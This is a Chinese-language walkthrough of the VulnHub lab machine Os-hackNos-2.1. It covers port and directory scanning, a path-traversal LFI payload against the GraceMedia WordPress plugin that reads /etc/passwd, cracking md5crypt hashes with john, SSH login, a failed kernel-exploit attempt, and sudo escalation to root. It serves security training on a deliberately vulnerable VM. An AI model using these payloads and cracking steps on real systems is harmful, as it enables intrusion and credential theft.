其他分享
首页 > 其他分享> > OS-HACKNOS-2.1

OS-HACKNOS-2.1

作者:互联网

OS-HACKNOS-2.1

目录

下载地址:hackNos: Os-hackNos-2.1 ~ VulnHub

1 信息收集

1.1 端口扫描

$ nmap -A -p - -T4 192.168.56.103 -oA OS-HACKNOS-2.1
Nmap scan report for 192.168.56.103
Host is up (0.00042s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:36:4e:71:6a:83:e2:c1:1e:a9:52:64:45:f6:29:80 (RSA)
|   256 b4:ce:5a:c3:3f:40:52:a6:ef:dc:d8:29:f3:2c:b5:d1 (ECDSA)
|_  256 09:6c:17:a1:a3:b4:c7:78:b9:ad:ec:de:8f:64:b1:7b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1.2 后台目录扫描

$ dirsearch -x403 -u http://192.168.56.103/
Target: http://192.168.56.103/

[22:21:48] Starting: 
[22:22:16] 200 -   11KB - /index.html
[22:22:34] 301 -  316B  - /tsweb  ->  http://192.168.56.103/tsweb/
[22:22:35] 200 -   43KB - /tsweb/

Task Completed

# /tsweb/目录扫描
$ dirsearch -u http://192.168.56.103/tsweb/
Target: http://192.168.56.103/tsweb/

[22:35:36] Starting: 
[22:35:51] 301 -    0B  - /tsweb/index.php  ->  http://192.168.56.103/tsweb/
[22:35:52] 200 -   19KB - /tsweb/license.txt
[22:35:57] 200 -    7KB - /tsweb/readme.html
[22:36:03] 301 -  325B  - /tsweb/wp-admin  ->  http://192.168.56.103/tsweb/wp-admin/
[22:36:03] 400 -    1B  - /tsweb/wp-admin/admin-ajax.php
[22:36:03] 302 -    0B  - /tsweb/wp-admin/  ->  http://192.168.56.103/tsweb/wp-login.php?redirect_to=http%3A%2F%2F192.168.56.103%2Ftsweb%2Fwp-admin%2F&reauth=1
[22:36:03] 500 -    3KB - /tsweb/wp-admin/setup-config.php
[22:36:03] 301 -  327B  - /tsweb/wp-content  ->  http://192.168.56.103/tsweb/wp-content/
[22:36:03] 200 -    0B  - /tsweb/wp-config.php
[22:36:03] 200 -    1KB - /tsweb/wp-admin/install.php
[22:36:03] 200 -    0B  - /tsweb/wp-content/
[22:36:03] 200 -   69B  - /tsweb/wp-content/plugins/akismet/akismet.php
[22:36:03] 500 -    0B  - /tsweb/wp-content/plugins/hello.php
[22:36:03] 200 -    1KB - /tsweb/wp-content/uploads/
[22:36:03] 200 -  796B  - /tsweb/wp-content/upgrade/
[22:36:03] 301 -  328B  - /tsweb/wp-includes  ->  http://192.168.56.103/tsweb/wp-includes/
[22:36:03] 200 -    0B  - /tsweb/wp-cron.php
[22:36:03] 500 -    0B  - /tsweb/wp-includes/rss-functions.php
[22:36:03] 302 -    0B  - /tsweb/wp-signup.php  ->  http://192.168.56.103/tsweb/wp-login.php?action=register
[22:36:03] 200 -    6KB - /tsweb/wp-login.php
[22:36:03] 200 -   45KB - /tsweb/wp-includes/
[22:36:04] 405 -   42B  - /tsweb/xmlrpc.php

Task Completed

1.2.1 目录分析

  1. http://192.168.56.103/tsweb/

    image-20220403222656837

1.2.2 WPScan扫描

$ wpscan --url http://192.168.56.103/tsweb/ -e vp --api-token Yourapi
 | [!] 1 vulnerability identified:
 |
 | [!] Title: GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
 |     References:
 |      - https://wpscan.com/vulnerability/a4f5b10f-3386-45cc-9548-dd7bbea199d6
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
 |      - https://www.exploit-db.com/exploits/46537/
 |      - https://seclists.org/fulldisclosure/2019/Mar/26
  1. 根据扫描结果发现目标系统使用的WP插件存在本地文件包含漏洞

2 WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion利用

  1. 访问WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion - PHP webapps Exploit (exploit-db.com)查看利用方式:

    Local File Inclusion POC:
    
    GET
    /wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
    
  2. 访问http://192.168.56.103/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd验证漏洞得到flag:

    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
    systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
    syslog:x:102:106::/home/syslog:/usr/sbin/nologin
    messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
    _apt:x:104:65534::/nonexistent:/usr/sbin/nologin
    lxd:x:105:65534::/var/lib/lxd/:/bin/false
    uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
    dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
    landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
    pollinate:x:109:1::/var/cache/pollinate:/bin/false
    sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
    rohit:x:1000:1000:hackNos:/home/rohit:/bin/bash
    mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
    flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash
    

2.1 爆破flag用户的密码

$ cat passwd
$1$flag$vqjCxzjtRc7PofLYS2lWf/

$ john --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt passwd
topsecret        (?)     

2.2 GetShell

# 使用flag:topsecret成功登录系统
$ ssh flag@192.168.56.103
flag@hacknos:/$ 

2.3 切换Python Shell

python3 -c "import pty;pty.spawn('/bin/bash')"

2.4 检测系统是否存在提权漏洞

flag@hacknos:/tmp/linux-exploit-suggester-1.1$ ./linux-exploit-suggester.sh 

Possible Exploits:

cat: write error: Broken pipe
[+] [CVE-2018-18955] subuid_shell

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
   Exposure: probable
   Tags: [ ubuntu=18.04 ]{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28}
   Download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip
   Comments: CONFIG_USER_NS needs to be enabled

3 提权

3.1 尝试利用CVE-2018-18955提权

  1. 下载exp:https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip

  2. kali编译exp:

    $ gcc subshell.c -o subshell
    $ gcc subuid_shell.c -o subuid_shell
    
  3. 上传exp到目标系统

    flag@hacknos:/tmp$ scp kali@192.168.56.102:/home/kali/45886/subshell .
    flag@hacknos:/tmp$ scp kali@192.168.56.102:/home/kali/45886/subuid_shell .
    
    
  4. 尝试利用exp失败

    flag@hacknos:/tmp$ cat /etc/shadow
    cat: /etc/shadow: Permission denied
    flag@hacknos:/tmp$ ./subuid_shell 
    newuidmap: uid range [0-1000) -> [100000-101000) not allowed
    subuid_shell: newuidmap failed
    flag@hacknos:/tmp$ ./subshell 
    subshell: write uid map: Operation not permitted
    subshell: read from sock: Success
    flag@hacknos:/tmp$ id
    uid=1001(flag) gid=1003(flag) groups=1003(flag)
    

3.2 收集当前系统信息

  1. 查看当前系统中的可疑文件

    flag@hacknos:/var/backups$ ls
    apt.extended_states.0  apt.extended_states.1.gz  passbkp
    flag@hacknos:/var/backups$ cat passbkp/md5-hash 
    $1$rohit$01Dl0NQKtgfeL08fGrggi0
    
  2. 查看flag用户所创建的文件:没有东东

    flag@hacknos:/$ find / -user flag 2>/dev/null | egrep -v "/proc" 
    
  3. 查看系统所设置的cap权限

    flag@hacknos:/$ getcap -r / 2>/dev/null
    /usr/bin/mtr-packet = cap_net_raw+ep
    
  4. 查看当前系统中具有sid权限的命令:没有东东

    flag@hacknos:/$ find / -perm -u=s 2>/dev/null 
    

3.3 切换用户

  1. 爆破flag用户的密码

    $ cat passwd
    $1$rohit$01Dl0NQKtgfeL08fGrggi0
    
    $ john --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt passwd
    !%hack41         (?)     
    
  2. 切换成功

    flag@hacknos:/var/www/html/tsweb$ su - rohit
    Password: 
    rohit@hacknos:~$
    
  3. 查看rohit用户的权限

    rohit@hacknos:~$ id
    uid=1000(rohit) gid=1000(rohit) groups=1000(rohit),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
    
  4. 查看rohit用户的sudo权限

    rohit@hacknos:~$ sudo -l
    [sudo] password for rohit: 
    Matching Defaults entries for rohit on hacknos:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    
    User rohit may run the following commands on hacknos:
        (ALL : ALL) ALL
    

3.4 提权

rohit@hacknos:~$ sudo -i
root@hacknos:~# cat root.txt 
 _______                         __              __  __     #
/       \                       /  |            /  |/  |    #
$$$$$$$  |  ______    ______   _$$ |_          _$$ |$$ |_   #
$$ |__$$ | /      \  /      \ / $$   |        / $$  $$   |  #
$$    $$< /$$$$$$  |/$$$$$$  |$$$$$$/         $$$$$$$$$$/   #
$$$$$$$  |$$ |  $$ |$$ |  $$ |  $$ | __       / $$  $$   |  # 
$$ |  $$ |$$ \__$$ |$$ \__$$ |  $$ |/  |      $$$$$$$$$$/   #
$$ |  $$ |$$    $$/ $$    $$/   $$  $$/         $$ |$$ |    #
$$/   $$/  $$$$$$/   $$$$$$/     $$$$/          $$/ $$/     #
#############################################################                                                          
                                                          
#############################################################                                                          
MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b

Blog : www.hackNos.com

Author : Rahul Gehlaut

linkedin : https://www.linkedin.com/in/rahulgehlaut/
#############################################################
root@hacknos:~#

标签:sbin,tsweb,22,HACKNOS,nologin,flag,usr,2.1,OS
来源: https://www.cnblogs.com/f-carey/p/16098182.html